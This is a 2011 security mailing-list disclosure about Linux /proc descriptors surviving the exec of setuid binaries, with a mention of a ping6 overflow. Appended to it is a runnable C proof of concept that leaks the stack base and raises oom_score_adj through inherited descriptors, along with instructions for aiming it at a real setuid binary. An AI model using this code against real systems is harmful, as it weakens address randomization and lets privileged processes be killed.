Date: Sat, 22 Jan 2011 07:39:22 +0000
From: halfdog <me@...fdog.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Proc filesystem and SUID-Binaries

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In my reply to the FD post "GNU libc/regcomp(3) Multiple Vulnerabilities" I
indicated that I found and reported the same bug while searching for
resource starvation bugs two years ago. So I dug out the programs from
back then to test suid binaries on a recent Linux distro and kernel. While
it is still possible to trigger quite a few different flaws, none of
them is quite interesting enough to investigate (mostly NULL and -1
derefs). But I got a minor but funny fault:

When executing a process as a normal user, one can open /proc/[pid]/
entries and keep them open, even after executing a suid binary. Thus it
is possible, e.g., to
* Find stack base even with stack randomization
* Modify oom_adj and kill the suid-binary with SIGKILL
* Modify the coredump filter
* Read limits

Damn it, that /proc/self/mem is not rw

See http://www.halfdog.net/Security/2011/SuidBinariesAndProcInterface/


Apart from that, ping6 contains a trivial buffer overflow using the size
parameter (>128000), but I think it is not exploitable to gain root
privileges.

See http://www.halfdog.net/Security/2011/Ping6BufferOverflow/

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFNOom3xFmThv7tq+4RAjYgAKCC/jMjYGQXGGdaf0ThCxbX5Ru+rwCdGby2
AI+Av64ClCQSYLREKmcJM2w=
=VPrq
-----END PGP SIGNATURE-----
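The following C program is an added example (mine, not halfdog's code and not taken from the linked write-up) of the mechanism behind the list in the post: a process opens several /proc/self entries without O_CLOEXEC, forks a helper that inherits those descriptors, and then execs another program. The helper holds no other handle on the new image, yet through the descriptors it already has it reads the stack base out of stat, reads limits, and raises oom_score_adj. The exec target is "sleep" as a stand-in for a setuid binary so the demo runs unprivileged; the function names, the 5-second exec timeout and the use of oom_score_adj (the successor of the oom_adj file named in the post) are my choices, and the stat line parsed by stat_startstack() is whatever the kernel returns. Against a real setuid target the helper could not open these files after the exec, because the kernel re-owns /proc/[pid] to root and marks the task non-dumpable, which is exactly why the descriptors must be opened beforehand; whether a given read still succeeds on a current kernel is a separate question, since later kernels added read-time ptrace-access checks to files such as stat, maps and mem.

```c
/* Added example (not halfdog's code). A /proc/self/<file> descriptor opened
 * before execve() survives the exec, so a helper that inherited it can keep
 * reading, and for oom_score_adj writing, the exec'd process's entries. The
 * target is "sleep", a stand-in for a setuid binary, so this runs unprivileged. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

struct probe {
    int comm_ok, limits_len;      /* exec observed via comm; bytes read from limits */
    long oom_before, oom_after;   /* oom_score_adj before and after the helper's write */
    unsigned long startstack;     /* stat field 28 of the exec'd image */
};

/* Extract startstack (field 28) from /proc/[pid]/stat text; comm may contain spaces. */
unsigned long stat_startstack(const char *text)
{
    const char *p = strrchr(text, ')');
    char buf[1024];
    int i = 0;
    if (!p) return 0;
    snprintf(buf, sizeof buf, "%s", p + 1);
    for (char *tok = strtok(buf, " "); tok; tok = strtok(NULL, " "), i++)
        if (i == 25)    /* field 3 (state) is token 0, so field 28 is token 25 */
            return strtoul(tok, NULL, 10);
    return 0;
}

/* Rewind and reread a small proc file through an already-open descriptor. */
static ssize_t reread(int fd, char *buf, size_t len)
{
    ssize_t n;
    if (lseek(fd, 0, SEEK_SET) < 0 || (n = read(fd, buf, len - 1)) < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Open /proc/self/<name> WITHOUT O_CLOEXEC so execve() leaves it open. */
static int open_proc_self(const char *name, int flags)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/self/%s", name);
    return open(path, flags);
}

/* Helper child: waits until the parent has exec'd, then uses the inherited fds. */
static void helper(int out, int fd_comm, int fd_stat, int fd_oom, int fd_limits)
{
    struct probe r = {0};
    char buf[4096];
    for (int i = 0; i < 500 && !r.comm_ok; i++)   /* allow up to 5 s for the exec */
        if (reread(fd_comm, buf, sizeof buf) > 0 && strcmp(buf, "sleep\n") == 0)
            r.comm_ok = 1;
        else
            usleep(10000);
    if (reread(fd_stat, buf, sizeof buf) > 0) r.startstack = stat_startstack(buf);
    if (reread(fd_oom, buf, sizeof buf) > 0) r.oom_before = strtol(buf, NULL, 10);
    /* Raising oom_score_adj needs no capability; it is what makes the OOM killer
     * pick (and SIGKILL) the victim first once memory runs out. */
    if (write(fd_oom, "1000", 4) == 4 && reread(fd_oom, buf, sizeof buf) > 0)
        r.oom_after = strtol(buf, NULL, 10);
    r.limits_len = (int)reread(fd_limits, buf, sizeof buf);
    _exit(write(out, &r, sizeof r) == (ssize_t)sizeof r ? 0 : 1);
}

/* Run the scenario in a child process and return what the helper observed. */
struct probe run_demo(void)
{
    struct probe r = {0};
    int pfd[2];
    if (pipe2(pfd, O_CLOEXEC) < 0) return r;   /* write end must die on exec */
    pid_t victim = fork();
    if (victim < 0) { close(pfd[0]); close(pfd[1]); return r; }
    if (victim == 0) {
        close(pfd[0]);
        int fd_comm = open_proc_self("comm", O_RDONLY);
        int fd_stat = open_proc_self("stat", O_RDONLY);
        int fd_oom = open_proc_self("oom_score_adj", O_RDWR);
        int fd_limits = open_proc_self("limits", O_RDONLY);
        if (fork() == 0)
            helper(pfd[1], fd_comm, fd_stat, fd_oom, fd_limits);
        execlp("sleep", "sleep", "30", (char *)0);   /* the four fds survive this */
        _exit(127);
    }
    close(pfd[1]);
    if (read(pfd[0], &r, sizeof r) != (ssize_t)sizeof r) memset(&r, 0, sizeof r);
    close(pfd[0]);
    kill(victim, SIGKILL);   /* tear the stand-in down instead of waiting 30 s */
    waitpid(victim, NULL, 0);
    return r;
}

int main(void)
{
    struct probe r = run_demo();
    printf("exec observed %d, startstack 0x%lx, oom_score_adj %ld -> %ld, limits %d bytes\n",
           r.comm_ok, r.startstack, r.oom_before, r.oom_after, r.limits_len);
    return 0;
}
```

Compile with `cc -o procfd procfd.c` and run it as an unprivileged user on Linux; run_demo() kills the sleep stand-in itself. To reproduce the post's scenario, replace the execlp() target with the setuid binary under test and give the helper time to act while it runs. The one line that matters for the attack is the open() without O_CLOEXEC: the permission check on each /proc file happens once, at open time, with the caller's own credentials, and nothing in execve() revokes descriptors that are not close-on-exec.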
